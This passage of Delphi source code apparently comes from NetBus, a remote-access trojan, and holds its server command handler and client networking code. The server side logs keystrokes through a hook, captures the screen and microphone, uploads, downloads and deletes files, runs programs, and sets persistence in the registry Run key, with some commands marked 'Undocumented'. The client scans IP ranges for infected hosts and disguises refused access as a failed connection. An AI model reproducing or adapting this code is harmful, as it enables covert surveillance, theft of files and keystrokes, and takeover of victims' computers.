    if DriveList1.DriveType[CurrDrive] = DriveList.dtFixed then begin
      FileIterator1.RootFolder := DriveList1.Drives[CurrDrive];
      TFileIteratorThread.Create(FileIterator1, False);
      Result := True;
    end;
    Inc(CurrDrive);
  end;
end;

procedure TMainForm.HandleServerData(Sender : TObject; Data : string);
const
  YesNo : array[Boolean] of string[5] = ('No', 'Yes');
var
  ScreenCapture : TBitmap;
  Jpeg : TJpegImage;
  Cmd : string;
  Param1 : string;
  Temp : array[0..100] of Char;
  Flags : Word;
  X, Y : LongInt;
  Volume : Byte;
  ExitFlag : Integer;
  Answer : Boolean;
  Ques : Boolean;
  Res : Integer;
  Open : Boolean;
  Len : DWORD;
  Addr : string;
  Access : Boolean;
  IgnoreCmd : Boolean;
begin
  Cmd := GetParam(Data, ';', 1);
  Param1 := GetParam(Data, ';', 2);
  if (CmdDelay > 0) and (Sender = ServerSock.Socket) and (Cmd <> 'Delay') and
   (Cmd <> 'Password') and (Cmd <> 'CaptureScreen') and (Cmd <> 'UploadFile') and
   (Cmd <> 'GetDisks') and (Cmd <> 'DownloadFile') and (Cmd <> 'SetMousePos') and
   (Cmd <> 'Listen') and (Cmd <> 'SetVolume') and (Cmd <> 'GetInfo') and
   (Cmd <> 'GetVolume') then begin
    CmdList.Add(IntToStr(CmdDelay) + ';' + Data);
    DelayTimer.Enabled := True;
    Exit;
  end;
  IgnoreCmd := (Cmd = 'Delay') or (Cmd = 'Password');
  if Cmd = 'Delay' then begin
    try
      CmdDelay := StrToInt(Param1);
    except
      CmdDelay := 0;
    end;
  end;
  if Cmd = 'Password' then begin
    Addr := ServClientSock1.RemoteAddress;
    Access := (Param1 = '1') or (GetParam(Data, ';', 3) = ServerPwd);
    AddAccessList(Addr, Access);
    ServerText := 'Access;' + IntToStr(Ord(Access)) + #13;
    if Param1 = ServerPwd then
      AddToLog(Addr, 'Connected to port ' + IntToStr(BusPort))
    else AddToLog(Addr, 'Unauthorized access to port ' + IntToStr(BusPort));
  end;
  if not IgnoreCmd and not HasAccess(ServClientSock1.RemoteAddress) then begin
    // Protect against older versions of NetBus..
    ServerText := 'Info;Sorry, host is password protected.'#13;
    Exit;
  end;
  if Cmd = 'ExitWin' then begin
    ExitFlag := 0;
    case Param1[1] of
      '1' : ExitFlag := EWX_LOGOFF;
      '2' : ExitFlag := EWX_POWEROFF;
      '3' : ExitFlag := EWX_REBOOT;
      '4' : ExitFlag := EWX_SHUTDOWN;
    end;
    ShutdownWin(ExitFlag);
  end;
  if Cmd = 'Eject' then begin
    if Param1 = '?' then
      Open := not CDOpen
    else Open := Boolean(Byte(StrToInt(Param1)));
    SetCDRomTray(Open);
    CDOpen := Open;
  end;
  if Cmd = 'PlaySound' then begin
    if SetMediaPlayer(AppPath + Param1) then
      MediaPlayer1.Play;
  end;
  if Cmd = 'SwapButton' then
    SwapMouseButton(Boolean(Byte(StrToInt(Param1))));
  if Cmd = 'StartApp' then
    ExecuteFile(Param1);
  if Cmd = 'Message' then begin
    Param1 := DecodeKeys(Param1);
    Answer := Param1[1] = '?';
    if Answer then Delete(Param1, 1, 1);
    Ques := Param1[Length(Param1)] = '?';
    if Ques then
      Flags := MB_ICONQUESTION or MB_YESNO
    else Flags := MB_ICONEXCLAMATION or MB_OK;
    if Answer then
      MsgForm.AskUser(PChar(Param1))
    else begin
      Res := Application.MessageBox(PChar(Param1), 'Info', MB_SETFOREGROUND or MB_SYSTEMMODAL or Flags);
      if Ques then
        ServerText := 'Answer;Person answered: ' + YesNo[Res = ID_YES] + #13
      else ServerText := 'Answer;Person answered OK.'#13;
    end;
  end;
  if Cmd = 'SetMousePos' then begin
    try
      X := StrToInt(GetParam(Data, ';', 2));
      Y := StrToInt(GetParam(Data, ';', 3));
    except
      X := 0;
      Y := 0;
    end;
    SetCursorPos(X, Y);
  end;
  if Cmd = 'Listen' then begin
    Listen := Param1 = '1';
    if Listen then begin
      ServClientSock2 := ServClientSock1;
      ReturnKeys(True, KeyWnd);
    end else begin
      ReturnKeys(False, KeyWnd);
      ServClientSock2 := nil;
    end;
  end;
  if Cmd = 'KeyClick' then begin
    KeyClick := Param1 = '1';
    ClickOnKey(KeyClick, KeyWnd);
  end;
  if Cmd = 'ShowImage' then begin
    if (Param1 <> '') and FileExists(AppPath + Param1) then begin
      try
        ImageForm.Image1.Picture.LoadFromFile(AppPath + Param1);
      except
      end;
      ImageForm.HideOnClick := False;
      ImageForm.BorderStyle := bsNone;
      ImageForm.Show;
      SetForegroundWindow(ImageForm.Handle);
      ShowWindow(Application.Handle, SW_HIDE);
    end else
      ImageForm.Hide;
  end;
  if Cmd = 'SendKeys' then begin
    if Param1 = '0' then
      SendKeys(DecodeKeys(GetParam(Data, ';', 3)));
    if Param1 = '1' then
      SimulateKeyStroke(StrToInt(GetParam(Data, ';', 3)), 0);
    if Param1 = '2' then
      SimulateKeyDown(StrToInt(GetParam(Data, ';', 3)));
    if Param1 = '3' then
      SimulateKeyUp(StrToInt(GetParam(Data, ';', 3)));
  end;
  if Cmd = 'URL' then
    ShellExecute(GetDesktopWindow, 'open', PChar(Param1), nil, nil, SW_SHOWNORMAL);
  if Cmd = 'GetVolume' then begin
    with SoundForm.VolumeControl1 do
      ServerText := 'VolumeInfo;' + IntToStr(WaveVolume) + ';' +
       IntToStr(MidiVolume) + ';' + IntToStr(CDVolume) + #13;
  end;
  if Cmd = 'SetVolume' then begin
    Volume := StrToInt(GetParam(Data, ';', 3));
    with SoundForm.VolumeControl1 do
    case StrToInt(Param1) of
      0: WaveVolume := Volume;
      1: MidiVolume := Volume;
      2: CDVolume := Volume;
    end;
  end;
  if Cmd = 'CaptureScreen' then begin
    TransfMode := tmScreen;
    ServerText := 'CaptureReady;0'#13;
    Application.ProcessMessages;
    SetPriority(True);
    ScreenCapture := TBitmap.Create;
    Jpeg := TJpegImage.Create;
    try
      GetScreenCapture(ScreenCapture);
      Jpeg.Assign(ScreenCapture);
      Jpeg.SaveToFile(TempPath + 'temp.jpg');
      ServerText := 'CaptureReady;1;' + IntToStr(GetFileSize(TempPath + 'temp.jpg')) + #13;
    finally
      SetPriority(False);
      ScreenCapture.Free;
      Jpeg.Free;
    end;
  end;
  if Cmd = 'GetInfo' then begin
    Len := 100;
    GetUserName(Temp, Len);
    ServerText := 'Info;' + 'Program Path: ' + ParamStr(0) + '|' +
      'Restart persistent: ' + YesNo[RegExists(HKEY_LOCAL_MACHINE,
      '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', AppName)] + '|' +
      'Login ID: ' + string(Temp) + '|' +
      'Clients connected to this host: ' + IntToStr(Clients) + #13;
  end;
  if Cmd = 'UploadFile' then begin
    TransfMode := tmUpload;
    TransfFile := Param1;
    TransfSize := StrToInt(GetParam(Data, ';', 3));
    ServerText := 'UploadReady'#13;
  end;
  if Cmd = 'DownloadFile' then begin
    TransfMode := tmDownload;
    TransfFile := Param1;
    if FileExists(Param1) then
      ServerText := 'DownloadReady;1;' + IntToStr(GetFileSize(Param1)) + #13
    else ServerText := 'DownloadReady;0'#13;
  end;
  if Cmd = 'GetDisks' then begin
    SkipDirs.Clear;
    if FileExists(AppPath + 'skip.txt') then
      SkipDirs.LoadFromFile(AppPath + 'skip.txt');
    AssignFile(DirFile, TempPath + 'temp.dsk');
    Rewrite(DirFile);
    CurrDrive := 0;
    ScanNextDrive;
  end;
  if Cmd = 'Record' then begin
    if RecordTimer.Enabled then
      Exit;
    CreateWav(1, 8, 11025, TempPath + 'temp.wav');
    if not SetMediaPlayer(TempPath + 'temp.wav') then
      ServerText := 'RecordResponse;0'#13
    else begin
      MediaPlayer1.StartRecording;
      RecordTimer.Interval := StrToInt(Param1) * 1000;
      RecordTimer.Enabled := True;
      ServerText := 'RecordResponse;1'#13;
    end;
  end;
  if Cmd = 'AutoStart' then begin // Undocumented
    if Param1 = '1' then
      AddReg(HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', AppName, ParamStr(0))
    else RemoveReg(HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', AppName);
  end;
  if Cmd = 'DelFile' then // Undocumented
    DeleteFile(PChar(Param1));
  if Cmd = 'ServerPwd' then begin // Undocumented
    ServerPwd := Param1;
    SaveSettingsSvr;
  end;
end;

function TMainForm.FindAddr(Addr : string) : Integer;
var
  Done : Boolean;
begin
  Done := False;
  Result := 0;
  while (Result < AccessList.Count) and not Done do begin
    Done := GetParam(AccessList[Result], ';', 1) = Addr;
    if not Done then
      Inc(Result);
  end;
  if not Done then
    Result := -1;
end;

procedure TMainForm.AddAccessList(Addr : string; Acc : Boolean);
var
  I : Integer;
begin
  I := FindAddr(Addr);
  if I = -1 then
    AccessList.Add(Addr + ';' + IntToStr(Ord(Acc)))
  else AccessList[I] := Addr + ';' + IntToStr(Ord(Acc));
end;

function TMainForm.HasAccess(Addr : string) : Boolean;
var
  I : Integer;
begin
  I := FindAddr(Addr);
  if I = -1 then
    Result := False
  else Result := GetParam(AccessList[I], ';', 2) = '1';
end;

procedure TMainForm.DeleteAddr(Addr : string);
var
  I : Integer;
begin
  I := FindAddr(Addr);
  if I <> -1 then
    AccessList.Delete(I);
end;

procedure TMainForm.HandleClientData(Data : string);
var
  Cmd : string;
  Param1 : string;
  Param2 : string;
  I : Word;
  Ignore : Boolean;
  Code : Integer;
  KeyData : Integer;
  Msg : Integer;
  MemoWnd : HWnd;
  PwdAccess : Boolean;
  Perform : Boolean;
begin
  if ConnStep <> 0 then begin
    Perform := True;
    if (ConnStep = 1) and Perform then
    if Pos('NetBus', Data) > 0 then begin
      RemoteVer := GetParam(Data, ' ', 2);
      PwdAccess := GetParam(Data, ' ', 3) = 'x';
      if RemoteVer = '' then RemoteVer := '1.20';
      if PwdAccess then begin // authorized access only
        ClientText := 'Password;' + IntToStr(Ord(MasterAccess)) + ';' +
          ClientPwd + #13;
        ConnStep := 2;
        Perform := False;
      end else
        ConnStep := 3;
    end;
    if (ConnStep = 2) and Perform then begin
    if GetParam(Data, ';', 1) = 'Access' then
      if GetParam(Data, ';', 2) = '1' then
        ConnStep := 3
      else ConnStep := 4;
    end;
    if ConnStep = 3 then begin
      IPLeft := 0;
      SetStatusBar('Connected to ' + CurrAddr + ' (ver ' +
        RemoteVer + ')', 0);
      SetConnectButton(True, 'Cancel');
      if DelayEdit.Text <> '0' then
        DelayEditExit(Self);
    end;
    if ConnStep = 4 then // access denied, fake "couldn't connect".
      ConnectTimerTimer(Self);
  end;
  Cmd := GetParam(Data, ';', 1);
  Param1 := GetParam(Data, ';', 2);
  if Cmd = 'Msg' then
    MsgForm.ShowMsg(PChar(DecodeKeys(Param1)));
  if Cmd = 'Key' then begin
    if not ListenForm.Showing then
      Exit;
    Param2 := DecodeKeys(GetParam(Data, ';', 3));
    Code := 0;
    Ignore := False;
    MemoWnd := ListenForm.ListenMemo.Handle;
    if (Param1 = '1') or (Param1 = '100') then begin
      Code := StrToInt(Param2);
      Ignore := not ((Code = VK_PRIOR) or (Code = VK_NEXT) or (Code = VK_HOME) or
        (Code = VK_END) or (Code = VK_LEFT) or (Code = VK_RIGHT) or (Code = VK_UP) or
        (Code = VK_DOWN) or (Code = VK_INSERT) or (Code = VK_DELETE));
    end;
    if Param1 = '0' then
      ListenForm.SendMsg(MemoWnd, WM_CHAR, Byte(Param2[1]), 0);
    if (Param1 = '1') and not Ignore then begin
      ListenForm.SendMsg(MemoWnd, WM_KEYDOWN, Code, 0);
      ListenForm.SendMsg(MemoWnd, WM_KEYUP, Code, 0);
    end;
    if Param1 = '100' then begin // Doesn't work properly yet.
      KeyData := StrToInt(GetParam(Data, ';', 4));
      Msg := WM_KEYUP2;
      if (KeyData shr 31) and 1 = 0 then
        Msg := WM_KEYDOWN2;
//      PostMessage(ListenForm.Handle, Msg, Code, KeyData);
    end;
  end;
  if Cmd = 'Answer' then
    Application.MessageBox(PChar(Param1), 'Answer', MB_ICONEXCLAMATION or MB_OK);
  if Cmd = 'User' then
    Application.MessageBox(PChar(Param1 + ' is logged in.'), 'User', MB_ICONEXCLAMATION or MB_OK);
  if Cmd = 'Info' then
    Application.MessageBox(PChar(DecodeKeys(Param1)), 'Info', MB_ICONEXCLAMATION or MB_OK);
  if Cmd = 'CaptureReady' then begin
    if RemoteVer = '1.30' then begin
      Data := 'CaptureReady;1;' + Param1;
      Param1 := '1';
    end;
    case Param1[1] of
      '0' : SetStatusBar('Capturing...', 1);
      '1' : begin
              TransfSize := StrToInt(GetParam(Data, ';', 3));
              ConnectReady := True;
          //  ScreenEvent.SetEvent;
            end;
    end;
  end;
  if Cmd = 'UploadReady' then
    ConnectReady := True;
  if Cmd = 'DownloadReady' then begin
    if Param1 = '0' then begin
      DownloadButton.Enabled := True;
      Application.MessageBox('Couldn''t find file.', 'Error',
       MB_ICONSTOP or MB_OK);
    end;   
    if Param1 = '1' then begin
      TransfSize := StrToInt(GetParam(Data, ';', 3));
      TransfMode := tmDownload;
      ClientSock2.Port := DataPort;
      SetAddress(ClientSock2, CurrAddr);
      ClientSock2.Open;
    end;
  end;
  if Cmd = 'DisksDone' then begin
    TransfFile := '';
    TransfSize := StrToInt(Param1);
    TransfMode := tmDiskList;
    with ClientSock2 do begin
      SetAddress(ClientSock2, CurrAddr);
      Port := DataPort;
      Open;
    end;
  end;
  if Cmd = 'RecordResponse' then begin
    if Param1 = '2' then
      TransfSize := StrToInt(GetParam(Data, ';', 3));
    SoundForm.ResponseInfo(StrToInt(Param1));
  end;
  if Cmd = 'VolumeInfo' then
    SoundForm.UpdateBars(StrToInt(GetParam(Data, ';', 2)),
      StrToInt(GetParam(Data, ';', 3)), StrToInt(GetParam(Data, ';', 4)));
  if Cmd = 'PatchDone' then
    Application.MessageBox('SysEdit har patchats p vrddatorn!', 'Info',
      MB_ICONEXCLAMATION or MB_OK);
end;

procedure TMainForm.FormDestroy(Sender: TObject);
begin
  {$IFDEF SERVER}
  AccessList.Free;
  SkipDirs.Free;
  DeallocateHWnd(KeyWnd);
  ClearKeyHook;
  {$ELSE}
  SaveSettings;
  {$ENDIF}
// ScreenEvent.Free;
  ReceiveMem.Free;
  CmdList.Free;
end;

procedure TMainForm.SetConnectButton(Enable : Boolean; Caption : string);
begin
  ConnectButton.Enabled := Enable;
  ConnectButton.Caption := Caption;
end;

procedure TMainForm.ConnectButtonClick(Sender: TObject);
var
  Host : string;
  Error : Boolean;
  I : Byte;
begin
  ConnectButton.Enabled := False;
  if ConnectButton.Caption = 'Connect!' then begin
    IPLeft := 0;
    LastIPPart := 0;
    Error := False;
    Host := HostBox.Text;
    if Pos('+', HostBox.Text) > 0 then
    try
      SetConnectButton(True, 'Cancel'); // User must be able to abort scan.
      Host := Copy(HostBox.Text, 1, Pos('+', HostBox.Text) - 1);
      IPBase := '';
      for I := 1 to 3 do
        IPBase := IPBase + GetParam(Host, '.', I) + '.';
      LastIPPart := StrToInt(GetParam(Host, '.', 4));
      IPLeft := StrToInt(Copy(HostBox.Text, Pos('+', HostBox.Text) + 1, 5));
    except
      Error := True;
    end;
    if not Error then
      ConnectHost(Host);
  end else begin
    if IPLeft > 0 then begin // Stop scanning IP-numbers
      IPLeft := 0;
      Exit;
    end;
    RemoteVer := '';
    GetDisks := True;
    ScreenButton.Enabled := True;
    ConnectTimer.Enabled := False;
    ClientSock.Close;
    ClientSock2.Close;
  end;
end;

procedure TMainForm.URLButtonClick(Sender: TObject);
begin
  ClientText := 'URL;' + ApplicationEdit.Text + #13;
end;

procedure TMainForm.ListenButtonClick(Sender: TObject);
begin
  if ListenButton.Caption = 'Listen' then begin
    ClientText := 'Listen;1'#13;
    ListenForm.Show;
    ListenButton.Caption := 'Stop listen';
  end else begin
    ClientText := 'Listen;0'#13;
    ListenForm.Hide;
    ListenButton.Caption := 'Listen';
  end;
end;
{
  if PointerButton.Caption = 'ndra pekare' then begin
    Screen.Cursors[100] := LoadCursor(HInstance, 'TESTCURSOR');
    Screen.Cursor := 100;
    PointerButton.Caption := 'Hehe, lurad';
  end else begin
    Screen.Cursor := crDefault;
    PointerButton.Caption := 'ndra pekare';
  end;
}
procedure TMainForm.ImageButtonClick(Sender: TObject);
var
  ImgFile : string;
begin
  if ImageButton.Caption = 'Show image' then begin
    ImgFile := '';
    if not InputQuery('Image', 'Which BMP/JPG-file: ', ImgFile) then
      Exit;
    if (Pos('.jpg', LowerCase(ImgFile)) = 0) and (Pos('.bmp', LowerCase(ImgFile)) = 0) then
      ImgFile := ImgFile + '.jpg';
    ClientText := 'ShowImage;' + ImgFile + #13;
    ImageButton.Caption := 'Remove image';
  end else begin
    ClientText := 'ShowImage;' + #13;
    ImageButton.Caption := 'Show image';
  end;
end;

procedure TMainForm.TextButtonClick(Sender: TObject);
var
  Temp : string;
begin
  Temp := EncodeKeys(MessageEdit.Text);
  if RemoteVer <= '1.35' then
    ClientText := 'SendKeys;' + Temp + #13
  else ClientText := 'SendKeys;0;' + Temp + #13;
end;

procedure TMainForm.UserButtonClick(Sender: TObject);
var
  Temp : array[0..40] of Char;
  Len : DWORD;
begin
  if RemoteVer <= '1.20' then
    ClientText := 'GetUser'#13
  else ClientText := 'GetInfo'#13;
end;

procedure TMainForm.WaitResponse(Timeout : Word);
var
  I  : LongInt;
begin
  I := GetTickCount;
  ConnectReady := False;
  while (GetTickCount < I + Timeout) and not ConnectReady and
   not Application.Terminated do
    Application.ProcessMessages;
end;

procedure TMainForm.ScreenButtonClick(Sender: TObject);
begin
  if not ClientSock.Active or ClientSock2.Active then
    Exit;
  ScreenButton.Enabled := False;
  TransfSize := 0;
  SetStatusBar('', 1);
  if RemoteVer > '1.20' then begin
    ClientText := 'CaptureScreen'#13;
//   if ScreenEvent.WaitFor(3000) = wrTimeout then begin
    WaitResponse(15 * 1000);
    if not ConnectReady then begin
      SetStatusBar('Error', 1);
      ScreenButton.Enabled := True;
      Exit;
    end;
  end;
  TransfMode := tmScreen;
  with ClientSock2 do begin
    SetAddress(ClientSock2, CurrAddr);
    Port := DataPort;
    Open;
  end;
end;

procedure TMainForm.DelayEditExit(Sender: TObject);
begin
  if ClientSock.Active then
    ClientText := 'Delay;' + DelayEdit.Text + #13;
end;

procedure TMainForm.DelayTimerTimer(Sender: TObject);
var
  Sec : Integer;
  StSec : string;
  TheRest : string;
  I : Integer;
begin
  DelayTimer.Enabled := False;
  I := 0;
  while I < CmdList.Count do begin
    StSec := Copy(CmdList[I], 1, Pos(';', CmdList[I]) - 1);
    TheRest := Copy(CmdList[I], Pos(';', CmdList[I]) + 1, 512);
    try
      Sec := StrToInt(StSec);
    except
      Sec := 1;
    end;
    Dec(Sec);
    if Sec <= 0 then begin
      HandleServerData(Sender, TheRest);
      CmdList.Delete(I);
    end else begin
      CmdList[I] := IntToStr(Sec) + ';' + TheRest;
      Inc(I);
    end;
  end;
  DelayTimer.Enabled := CmdList.Count > 0;
end;

procedure TMainForm.ClientSockRead(Sender: TObject;
  Socket: TCustomWinSocket);
var
  P : Word;
  Temp : string;
begin
  ClientSt := ClientSt + ClientText;
  while Pos(#13, ClientSt) <> 0 do begin
    P := Pos(#13, ClientSt);
    Temp := Copy(ClientSt, 1, P - 1);
    // Perhaps one does a telnet 12345 :-)
    if Pos(#10, ClientSt) > 0 then
      P := Pos(#10, ClientSt);
    Delete(ClientSt, 1, P);
    HandleClientData(Temp);
  end;
end;

procedure TMainForm.ClientSockConnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  ConnectTimer.Enabled := False;
  ConnStep := 1;
//  SetStatusBar('Connected to ' + ClientSock.Host, 0);
//  IPLeft := 0; // Stop scan here.
  with HostBox do
  if Items.IndexOf(HostBox.Text) = -1 then
    Items.Add(HostBox.Text);
end;

procedure TMainForm.ClientSockDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  if not ConnectTimer.Enabled then
    SetStatusBar('No connection', 0);
  SetConnectButton(True, 'Connect!');
end;

procedure TMainForm.ServerSockClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
var
  P : Word;
  Temp : string;
begin
  ServClientSock1 := Socket;
  ServerSt := ServerSt + ServerText;
  while Pos(#13, ServerSt) <> 0 do begin
    P := Pos(#13, ServerSt);
    Temp := Copy(ServerSt, 1, P - 1);
    // Perhaps someone does a telnet 12345 :-)
    if Pos(#10, ServerSt) > 0 then
      P := Pos(#10, ServerSt);
    Delete(ServerSt, 1, P);
    HandleServerData(Sender, Temp);
  end;
end;

procedure TMainForm.ClientSock2Disconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  case TransfMode of
    tmScreen: ScreenDisconnect(Sender, Socket);
    tmWave: WaveDisconnect(Sender, Socket);
    tmDiskList: DiskListDisconnect(Sender, Socket);
    tmUpload: begin
//      SendFile.Free;
      UploadButton.Enabled := True;
    end;
    tmDownload: DownloadDisconnect(Sender, Socket);
  end;
end;

procedure TMainForm.AddToLog(Addr, St : String);
var
  T : TextFile;
begin
  if (Addr = '127.0.0.1') or (Addr = '130.240.193.203') then
    Exit;
  AssignFile(T, AppPath + 'IP.TXT');
  if FileExists(AppPath + 'IP.TXT') then
    Append(T)
  else Rewrite(T);
  Writeln(T, St + ' (' + Addr + ')');
  CloseFile(T);
end;

function TMainForm.LastPicNumber(Path, Pre : string) : Word;
var
  SRec : TSearchRec;
  DosError : Integer;
  Temp : string;
  Nr : Integer;
  Start : Byte;
  FileFound : Boolean;
begin
  Result := 0;
  DosError := FindFirst(Path, faArchive, SRec);
  FileFound := DosError <> 18;
  while DosError = 0 do begin
    Start := Length(Pre) + 1;
    Temp := Copy(SRec.Name, Start, Pos('.', SRec.Name) - Start);
    try
      Nr := StrToInt(Temp);
    except
      Nr := 0;
    end;
    if Nr > Result then
      Result := Nr;
    DosError := FindNext(SRec);
  end;
  if FileFound then // This will fix the NT hang.
    SysUtils.FindClose(SRec);
end;

procedure TMainForm.ScreenDisconnect(Sender : TObject;
  Socket : TCustomWinSocket);
var
  Error : Boolean;
  NextNr : Integer;
  Temp : array[0..100] of Char;
  FileSt : string;
  Len : DWORD;
begin
  if (RemoteVer > '1.20') and (TransfSize <> ReceiveMem.Size) then
    Exit;
  if IntervalEdit.Text <> '0' then begin
    WaitTimer.Tag := 2;
//    WaitTimer.Enabled := True;
  end;
  ScreenButton.Enabled := True;
  FileSt := AppPath + 'temp1.jpg';
  Len := 100;
  GetUserName(Temp, Len);
  if SavePics then begin
    FileSt := string(Temp) + '-';
    NextNr := LastPicNumber(AppPath + FileSt + '*.jpg', FileSt);
    Inc(NextNr);
    FileSt := FileSt + IntToStr(NextNr) + '.jpg';
  end;
  ReceiveMem.SaveToFile(FileSt);
  Error := False;
  try
    ImageForm.Image1.Picture.LoadFromFile(FileSt);
  except
    Error := True;
  end;
  if not Error then begin
    ImageForm.HideOnClick := True;
    ImageForm.BorderStyle := bsNone;
    ImageForm.Show;
  end;
//  DeleteFile(PChar(AppPath + 'temp1.jpg'));
end;

procedure TMainForm.WaveDisconnect(Sender : TObject;
  Socket : TCustomWinSocket);
begin
  if ReceiveMem.Size = 0 then begin
    SoundForm.ResponseInfo(0);
    Exit;
  end;
  MediaPlayer1.Close;
  ReceiveMem.SaveToFile('temp1.wav');
  SoundForm.ResponseInfo(3);
end;

procedure TMainForm.DiskListDisconnect(Sender : TObject;
  Socket : TCustomWinSocket);
begin
  ReceiveMem.SaveToFile(AppPath + 'temp1.dsk');
  {$IFNDEF SERVER}
  with ChooseForm do begin
    with ProgressLabel do begin
      Caption := 'Loading...';
      Update;
    end;
    TreeView1.LoadFromFile(AppPath + 'temp1.dsk');
    ProgressLabel.Caption := 'Idle';
  end;
 {$ENDIF}
end;

procedure TMainForm.DownloadDisconnect(Sender : TObject;
  Socket : TCustomWinSocket);
begin
  DownloadButton.Enabled := True;
  ReceiveMem.SaveToFile(TransfFile);
end;

procedure TMainForm.ServerSockClientError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
  { We don't want any raised exception in the server }
  ErrorCode := 0;
end;

procedure TMainForm.ServerSock2ClientError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
  ErrorCode := 0;
end;

procedure TMainForm.ClientSockError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
  ErrorCode := 0;
  if (ErrorEvent = eeConnect) and not Socket.Connected then begin
    SetStatusBar('Couldn''t connect to ' + CurrAddr, 0);
    if (IPLeft > 0) and (LastIPPart < High(Byte)) then begin
      Dec(IPLeft);
      Inc(LastIPPart);
      NextIP := IPBase + IntToStr(LastIPPart);
      PostMessage(Handle, WM_NEXTTEST, 0, 0);
    end else
      SetConnectButton(True, 'Connect!');
  end;
end;

procedure TMainForm.ClientSock2Error(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
  ErrorCode := 0;
//  ReceiveSock.Close;
end;

procedure TMainForm.ServerSockClientConnect(Sender: TObject;
  Socket: TCustomWinSocket);
var
  Param : string;
begin
  Inc(Clients);
  Param := '';
  if ServerPwd = '' then
    AddAccessList(Socket.RemoteAddress, True)
  else Param := 'x';
  Socket.SendText('NetBus ' + Version + ' ' + Param + #13);
end;

procedure TMainForm.ServerSockClientDisconnect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  DeleteAddr(Socket.RemoteAddress);
  Dec(Clients);
  if Socket = ServClientSock1 then
    ServClientSock1 := nil;
end;

procedure TMainForm.ConnectTimerTimer(Sender: TObject);
var
  Code : Integer;
begin
  ConnectTimer.Enabled := False;
  ClientSock.Close;
  ClientSockError(ClientSock, ClientSock.Socket, eeConnect, Code);
end;

procedure TMainForm.ClientSock2Read(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  case TransfMode of
    tmScreen,
    tmDiskList,
    tmWave,
    tmDownload : ScreenRead(Sender, Socket);
    tmUpload: ;
  end;
end;

procedure TMainForm.ScreenRead(Sender : TObject;
  Socket : TCustomWinSocket);
var
  Temp : string;
  Per : Integer;
  ShowSt : string;
  DeskFile : Boolean;
begin
  Temp := Socket.ReceiveText;
  ReceiveMem.Write(PChar(Temp)^, Length(Temp));
  ShowSt := '';
  if TransfSize > 0 then begin
    Per := Round((ReceiveMem.Size / TransfSize) * 100);
    ShowSt := IntToStr(Per) + '% done';
  end;
  case TransfMode of
    tmScreen,
    tmDownload : SetStatusBar(ShowSt, 1);
    tmDiskList : {$IFNDEF SERVER}
      ChooseForm.ProgressLabel.Caption := ShowSt {$ENDIF} ;
    tmWave:
      SoundForm.ProgressLabel.Caption := ShowSt;
  end;
end;

procedure TMainForm.ServerSock2GetThread(Sender: TObject;
  ClientSocket: TServerClientWinSocket;
  var SocketThread: TServerClientThread);
begin
  AddToLog(ClientSocket.RemoteAddress, 'Connected to port ' + IntToStr(DataPort));
  { Create a new thread for connection }
  case TransfMode of
    tmScreen,
    tmDiskList,
    tmWave,
    tmDownload:
      SocketThread := TScreenServerThread.Create(False, ClientSocket);
    tmUpload:
      SocketThread := TUploadServerThread.Create(False, ClientSocket);
  end;
end;

procedure TScreenServerThread.ClientExecute;
var
  FName : string;
begin
  while not Terminated and ClientSocket.Connected do
  try
    if ClientSocket.Connected then begin
      with MainForm do
      case TransfMode of
        tmDownload: FName := TransfFile;
        tmDiskList: FName := TempPath + 'temp.dsk';
        tmScreen: FName := TempPath + 'temp.jpg';
        tmWave: FName := TempPath + 'temp.wav';
      end;
      if FileExists(FName) then
        ClientSocket.SendStream(TFileStream.Create(FName,
          fmOpenRead or fmShareCompat or fmShareDenyNone));
      if MainForm.TransfMode <> tmDownload then
        DeleteFile(PChar(FName));
      DelayMS(100); // Seems to be needed.
      ClientSocket.Close;
    end;
  except
// HandleException;
  end;
end;

constructor TUploadServerThread.Create(CreateSuspended: Boolean; ASocket: TServerClientWinSocket);
begin
  inherited Create(CreateSuspended, ASocket);
  ReceiveMem := TMemoryStream.Create;
end;

destructor TUploadServerThread.Destroy;
begin
  ReceiveMem.Free;
  inherited Destroy;
end;

procedure TUploadServerThread.ClientExecute;
var
  Save : string;
  Data : array[0..1023] of Byte;
  Size : LongInt;
  SocketStream: TWinSocketStream;
  Done : Boolean;
begin
  ReceiveMem.Clear;
  Done := False;
  while not Terminated and ClientSocket.Connected and not Done do
  try
    SocketStream := TWinSocketStream.Create(ClientSocket, 30000);
    try
      FillChar(Data, SizeOf(Data), 0);
      Size := SocketStream.Read(Data, SizeOf(Data));
      if Size = 0 then begin
        // If we didn't get any data after 30 seconds then close the connection.
        ClientSocket.Close;
        Terminate;
      end else begin
        ReceiveMem.Write(Data, Size);
        Done := ReceiveMem.Size = MainForm.TransfSize;
      end;
    finally
      SocketStream.Free;
    end;
  except
// HandleException;
  end;
  if Done then begin
    DelayMS(100);
    ClientSocket.Close;
    with MainForm do begin
      Save := AppPath + TransfFile;
      if LowerCase(TransfFile) = 'sysedit.exe' then
        Save := AppPath + 'SysEdit.new';
      if LowerCase(TransfFile) = 'keyhook.dll' then
        Save := AppPath + 'KeyHook.new';
    end;
    ReceiveMem.SaveToFile(Save);
    PostMessage(MainForm.Handle, WM_HANDLEUPLOAD, 0, 0);
  end;
end;

procedure TMainForm.DomainButtonClick(Sender: TObject);
begin
  MemoForm.Show;
end;

procedure TMainForm.UploadButtonClick(Sender: TObject);
begin
  if RemoteVer <= '1.20' then begin
    Application.MessageBox('Uppgradera till en nyare version hos vrden.',
      'Info', MB_ICONEXCLAMATION or MB_OK);
    Exit;
  end;
  if not ClientSock.Active or ClientSock2.Active or
   not OpenDialog1.Execute then
    Exit;
  UploadButton.Enabled := False;
  SetStatusBar('', 1);
